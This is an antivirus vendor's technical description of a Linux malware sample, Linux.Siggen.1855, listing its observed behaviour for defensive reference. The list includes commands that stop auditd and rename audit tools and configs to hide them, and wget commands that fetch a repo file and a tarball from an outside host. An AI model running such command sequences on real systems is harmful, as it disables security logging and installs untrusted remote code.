Linux.Siggen.1855
Added to the Dr.Web virus database: 2019-06-21
Virus description added: 2019-06-21
Technical Information
Malicious functions:
Performs process tracing:
- <SAMPLE>
- <SAMPLE_FULL_PATH>
Manages services:
- /sbin/service auditd stop
- /sbin/service wsosstatd stop
Launches processes:
- /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/bash <SAMPLE_FULL_PATH> -c
- cat /etc/issue
- head -n 1
- grep -iE Red.*release 4|CentOS.*4\.
- grep -iE Red.*release 4|CentOS.*4\. /etc/redhat-release
- grep -iE Red.*release 5|CentOS.*5\.
- grep -iE Red.*release 5|CentOS.*5\. /etc/redhat-release
- grep -iE Red.*release 6|CentOS.*6\.
- grep -iE Red.*release 6|CentOS.*6\. /etc/redhat-release
- /sbin/ifconfig -a
- grep inet
- grep -v 127.0.0.1
- grep -v inet6
- grep -v ^169.254
- tr -d addr:
- wc -l
- sed s/\([0-9]\+\.[0-9]\+\.[0-9]\+\)\.[0-9]\+/\1/g
- awk {print $2}
- sleep 5
- wget -e -http-proxy= -t 2 -T 50 http://wsautoinstall1.lxdns.com/ws.repo -O /etc/yum.repos.d/ws.repo
- grep already
- mkdir -p /var/lib/local/etc/WsCdnOsStatLog/LogSummary/wsosstad/.wsosstat/
- mv /etc/audisp/audispd.conf /etc/audisp/wsosstatdispd.conf
- mv /etc/audit/audit.rules /etc/audit/wsosstat.acl
- mv /etc/audit/auditd.conf /etc/audit/wsosstatd.conf
- mv /etc/rc.d/init.d/auditd /etc/rc.d/init.d/wsosstatd
- mv /etc/sysconfig/auditd /etc/sysconfig/wsosstatd
- mv /etc/audisp /etc/wsosstatdisp
- mv /etc/audit /etc/wsosstat
- mv /sbin/audispd /sbin/wsosstatdispd
- mv /sbin/auditctl /sbin/wsosstatctl
- mv /sbin/auditd /sbin/wsosstatd
- mv /sbin/aureport /sbin/wsosstatreport
- mv /sbin/ausearch /sbin/wsosstatsearch
- mv /sbin/autrace /sbin/wsosstattrace
- mv /usr/bin/aulastlog /usr/bin/wsosstatlastlog
- mv /usr/bin/ausyscall /usr/bin/wsosstatsyscall
- /sbin/chkconfig --add wsosstatd
- xargs -i rm -rf {}
- find /etc/rc.d -name *auditd*
- wget -e -http-proxy= -t 2 -T 50 http://wsautoinstall1.lxdns.com/tools/wsosstat.tar.gz -O /tmp/wsosstat.tar.gz
Kills the following processes:
- <SAMPLE>
- <SAMPLE_FULL_PATH>
Performs operations with the file system:
Creates folders:
- /var/lib/local
- /var/lib/local/etc
- /var/lib/local/etc/WsCdnOsStatLog
- /var/lib/local/etc/WsCdnOsStatLog/LogSummary
- /var/lib/local/etc/WsCdnOsStatLog/LogSummary/wsosstad
- /var/lib/local/etc/WsCdnOsStatLog/LogSummary/wsosstad/.wsosstat
Creates or modifies files:
- /etc/yum.repos.d/ws.repo
- /tmp/wsosstat.tar.gz
Network activity:
Establishes connection:
HTTP GET requests:
- ws###########1.lxdns.com/tools/wsosstat.tar.gz
DNS ASK:
Other:
Collects OS information
Collects RAM information